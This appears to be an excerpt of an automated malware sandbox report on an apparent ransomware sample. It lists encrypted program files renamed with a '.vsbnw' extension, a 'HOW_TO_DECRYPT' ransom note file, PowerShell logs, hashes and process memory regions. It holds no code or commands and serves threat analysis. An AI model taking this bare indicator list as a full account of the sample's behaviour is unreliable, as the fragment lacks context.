          f3b2ca4d3160a089f6959b7c8e3e6c213c0facb2733f7948a7222196d3bd8c7350015602569df2cdc7408e38b0ff6700306d7e3439f0892b4d13d9f2d5329e42

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          7KB

          MD5

          8172eee1f0e4b5c3c0fbdd1f3bc5e028

          SHA1

          a37f8772007a6399cb9e7afb3070c5488276c4d4

          SHA256

          7491251b4247a91f3555f97bde932fd7c852b2f1a034f0de68b974b99f259f70

          SHA512

          710db848d0a0661946a2350001e4074d3fb39faf0aa1e5976f71e66fed06c0cca4e03b1a1a46506ec6787a4bad0f6ee1c76a22d10f0d5ac0bee28dccfca1ef08

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          8KB

          MD5

          8609f74db505a1ec466d7a2112c1cf0c

          SHA1

          417100b2e529110c7f3884858e90260115f5d914

          SHA256

          cbf4e4c1d2d142ba701342525c2bffafdd9094765684686dce71b7c97c73ec1e

          SHA512

          685f37ef6266253421c2cc921bccef2259dd0cd70a8fc0f6c014e2e7d4398bcddd1d2a36fef29322d84300dae3d5d10f2b50c828dc5ebe4bf7784d03da6adba5

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JAAAACQAAAA0.vsbnw
          Filesize

          823B

          MD5

          5e884e2f05ac036b7a6cded3efc2ea2d

          SHA1

          807c1cf1bf0943404601b6241bf4bcf9fcc29c9e

          SHA256

          b333de3a4a7be7749b82302085ed26ad868f0f8eccd09d2a8bb8840414e624d6

          SHA512

          6665aa6fa35e05d01a4a2312a93faf52d6b39409bfaa861c187b0cc2fc51e74aa253ebf56061872d548cb6d3d7bbf1f7c2568de81e5287e0a1d6591c1e780f15

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_FgAAABYAAAA0.vsbnw
          Filesize

          1KB

          MD5

          3dde11f8594519f004ded2687db9b90e

          SHA1

          fcf1854df851616a25d7cf1439a9120b16902420

          SHA256

          196c132938d324c62184ddc85bdb1cd642af830712e0fbf0fb3230978316d510

          SHA512

          adc2cb3a37dbf5fe2ae79f5752c0d38d2427a95e333e848ffa113046f630eaa967b3cb29c049dcdd9b921d57e23392562d779c24207f770aba6e92392064f17b

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          1KB

          MD5

          d59d8ff7aaa17ee875adbe48b7a77e78

          SHA1

          7405acc07f6137b7fd9575f99a2b4354135956ef

          SHA256

          d74c0782682efde01c1c30e46814256f7d16d7df00a7167d90f2bd55ebaab626

          SHA512

          63fc8bef9e8ef833e45d99f954a9eb99d6bbcae39b2eca8a7000ac11b976cdd0ce0581e5e5e6b2f1bb2bdc911e31690e503dad945f0a3ea702dfe404896eded8

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_NAAAADQAAAA0.vsbnw
          Filesize

          802B

          MD5

          bfeb063e064c71e44ce75898e79c61bc

          SHA1

          c4dcb4b6814cbee53b415a2a5df02fa500510ef3

          SHA256

          af439ebb0d55750003f7dbec517e7b0b26a6a0506b21e3b74d800cd1c7faa004

          SHA512

          0835ebe63867fba6d69a25c83dca767ffd9c57907ba76d9c71012be18510e2145a358d37c1cf4e4ad35d1cdd4f67ffd5928e70e18a376db607d8482356f12219

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          2KB

          MD5

          4c27ad089d04cfefd979d56f2a67b172

          SHA1

          63289f9198ee4553759b07de7a4229ad370fa976

          SHA256

          e34bcd5b8436d3bc45f98dd913d41f185c6b06326b66937d6e0d5c6434b16fe7

          SHA512

          23f9283f769fd310dcac26cac00d2eb033763d73bd45b0d148ea1ec3a3c75b073572c9fa9234699372a7e1caad7fcde7629d004815536df1d39d291f2d2d96a9

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JgAAACYAAAA0.vsbnw
          Filesize

          2KB

          MD5

          61bd39ed095fa82ffd334fbd7982616c

          SHA1

          51af9c2cd42743c5cf81200e0fba3cfaff801885

          SHA256

          237a70fe0388ce6884f5424692c460625691ef7acb0bf80403ec6b25f348b94a

          SHA512

          54dd8e1a5c19a9d51892a12e9501b7f6f69e09e0c446ec36f7ddfd9ad0d9cef52604ab2f8071c71ce63989510a703f1cfd5492e1ac20c8b37258ba21f8952400

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          289B

          MD5

          36503740756a442b7be294947462be83

          SHA1

          a1203ae869deb46f59a3273f6d130e7457bf5321

          SHA256

          d188ab283c552eee50677129f3b0ffd8d97828c4e7007bea258174c9a2200e87

          SHA512

          6ff98b15c7d757dd351bf50a1c4ac759a73fdafe03d5fad506478550987d0ec016ba9e617c099e6bf7b0263846eddc4eb32cb70fb1fbbc1189791defe556967a

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AgAAAAIAAAA0.vsbnw
          Filesize

          1003B

          MD5

          c5aab3d175e0a3753ed2c3bbd7b929c1

          SHA1

          3ebee0101ad62449a67f506df9c8e7dacc39f877

          SHA256

          2e187b74e926afe70eafe0648c7125817e99f5586eee3e2e05446e360d4cc1bd

          SHA512

          e967020462477c3e9465e3383c544cf468dd89f4da084193634f5bcdc001b90f5bad3f4f6dda9e95ebe068108986daf41504e02331f4922ea25e7ffee1f27040

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_CgAAAAoAAAA0.vsbnw
          Filesize

          1KB

          MD5

          808971f45b803583d9d1f812803d81b7

          SHA1

          0f6aaecba7c976ed8c2f53782b3d3148f41b2905

          SHA256

          c25d9409ddf9645c2731ec785cacbb7568005bfc78fe0aec7df3ae3c4d30e333

          SHA512

          121e6b01125f9e9d4894f7d498bb4d39ce676ce51e29cbcd148e0c1feed46fbc58267cea7d5f66654be831dc479e4643be8b28b005467309b7df5cc7fbcd0dbe

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_OAAAADgAAAA0.vsbnw
          Filesize

          2KB

          MD5

          ad68c0b141ea1dbfcadb540c1817289f

          SHA1

          548a46167f7f5193c5a1335753bc208bf92aa504

          SHA256

          537ac64cd204d7ef82cfe41c932deb9cb1ae738b2156eff4dbf73208384c0a13

          SHA512

          269ae39458a9f30351166f304825b777f3ff143b7914b98e83e01600fa04c7790e6e813466c2a1c5396ce13cd2199792905cf0baba1cd28a420440efce0843e8

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          385B

          MD5

          c789d387908d7b7f21c6474a86e84019

          SHA1

          1c36fc6954178c43d9249a5ff3c7246057c6aead

          SHA256

          223f32512aec50c1c00fafc476d8e4ce61e79aa748c67b72fe55514882a31a5a

          SHA512

          1cab85dff119b591046049b69b6208283ca5e009d95129bb407df2768c82da30fd2af8debf6f1bbd91f37518538f3ba6bcda32b63d1d278b56fdd1f5f93439ca

          Download Submit

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          840B

          MD5

          32147da1c647161e45a1004eb1b16349

          SHA1

          a953c222cce91729ebab36bddd43bd5a795a69cc

          SHA256

          434731fdc6d2f5115c5f7786ac989fedef7d0f60cd2ad4385cc98f6d2160566c

          SHA512

          8c825f8d38519cdac2a49e4ee8a9564ae72839199562ce9acfe72b4fbb94f8946775054782cf26a9566eaf8cf944a26e42b7b372c4e7349b33a8e17dcd13df94

          Download Submit

        • C:\Program Files\Java\jre-1.8\lib\images\cursors\invalid32x32.gif.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_DgAAAA4AAAA0.vsbnw
          Filesize

          153B

          MD5

          1e9d8f133a442da6b0c74d49bc84a341

          SHA1

          259edc45b4569427e8319895a444f4295d54348f

          SHA256

          1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

          SHA512

          63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

          Download Submit

        • C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_F_COL.HXK.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JAAAACQAAAA0.vsbnw
          Filesize

          114B

          MD5

          b8fbbc73ddde31636552ab184b4e398f

          SHA1

          5cfbfaea56e979a07c083f2340b10a5894812d78

          SHA256

          3c3702253a4695b5bcb18a2565b1d49f9f32f5f9f2442fd1395197970fa34edb

          SHA512

          7f0f4b098e0d37ed403be8d54e2dcbc603791ddf00e3a21747c41ecfb829fdf664b6bddda8d51309e1229b197244a1d8ae23e1b3bf3348f99f84a7a8684db8d7

          Download Submit

        • C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_K_COL.HXK.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JAAAACQAAAA0.vsbnw
          Filesize

          113B

          MD5

          db9742e49c49c505b293a84518e95fa5

          SHA1

          406dae0b226900aad2ad2e10d8366651b848c053

          SHA256

          1c17b95e5098adb0c0e06aac8a8c7c50c6a5ef1b696465d548c8a922f1d3a653

          SHA512

          974917a72b2b3b783bb0ffcbfe0058489ae65ac0aa71ae86d77195780aeb7800848a3158fbe7ad8ddf9b30145d8a1a2c66f72484305ccf363b7981f105be295b

          Download Submit

        • C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw
          Filesize

          604KB

          MD5

          dda11456a5307b84086befe8995cf101

          SHA1

          7f6cc427f73498c81a214b41104b7ef9c24d6574

          SHA256

          1440ecb9b5a6f7b5132722516c79edd47ec69af6710b8a3c7c62f8603d2dc982

          SHA512

          ac043b986f895c8ae48f3b9eb3ddf2ea4324463f9c92a1d55cbffca1fc85d1ff71f7e39c190cd3bd88e6f126bbc5415dffca4a31d8a46914cf55b76032d9e7b8

          Download Submit

        • C:\Program Files\yxjL_HOW_TO_DECRYPT.txt
          Filesize

          1KB

          MD5

          45cfb934ec29f5e73f7e81fbcdb87581

          SHA1

          3599e538a33ea625641712350c34406d1ca27047

          SHA256

          2eb37477bce5aceb507003f28e068dd331c61c57c01b71eb15f5f8914fb0854d

          SHA512

          49757baf3f5e874431437efae14cdbda72fcd1c23d4d53a81b08afd08bc16f148acf7d2cc37f35975e7b9775be43e3e101d1ab084ab02d0ba3fa4793d066d42a

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          2da6095b0e2284419799ed0d655aea5e

          SHA1

          be113df1746b1f9e53dfd032502f2ce77797563b

          SHA256

          3c7d0a0763e9b96f54200b07f8e80734d6dacc297b33c6494acbf74bd875828a

          SHA512

          413c96a512745dffe1bf79a2c7612685f62262a1b8d0a5ae3b6010bb7062f205c00f03cb0022fe81a3fb198ce961fee38dc894066182bf7c2fe9810eeb081af4

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hnl3kpnt.2ll.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/372-55-0x0000000074610000-0x000000007465C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/372-53-0x0000000005970000-0x0000000005CC4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1396-32-0x00000000080B0000-0x000000000872A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/1396-19-0x0000000006D00000-0x0000000006D32000-memory.dmp

          Filesize

          200KB

          Download

        • memory/1396-37-0x0000000007CA0000-0x0000000007CAE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/1396-36-0x0000000007C70000-0x0000000007C81000-memory.dmp

          Filesize

          68KB

          Download

        • memory/1396-35-0x0000000007CF0000-0x0000000007D86000-memory.dmp

          Filesize

          600KB

          Download

        • memory/1396-34-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/1396-33-0x0000000007A70000-0x0000000007A8A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1396-39-0x0000000007DB0000-0x0000000007DCA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1396-31-0x0000000007930000-0x00000000079D3000-memory.dmp

          Filesize

          652KB

          Download

        • memory/1396-30-0x0000000006D50000-0x0000000006D6E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1396-20-0x0000000074610000-0x000000007465C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1396-38-0x0000000007CB0000-0x0000000007CC4000-memory.dmp

          Filesize

          80KB

          Download

        • memory/1396-18-0x0000000006780000-0x00000000067CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1396-17-0x0000000006740000-0x000000000675E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1396-16-0x0000000006170000-0x00000000064C4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1396-40-0x0000000007D90000-0x0000000007D98000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1396-6-0x0000000006100000-0x0000000006166000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1396-5-0x0000000005F60000-0x0000000005FC6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1396-4-0x0000000005EC0000-0x0000000005EE2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1396-3-0x0000000005890000-0x0000000005EB8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/1396-2-0x00000000051B0000-0x00000000051E6000-memory.dmp

          Filesize

          216KB

          Download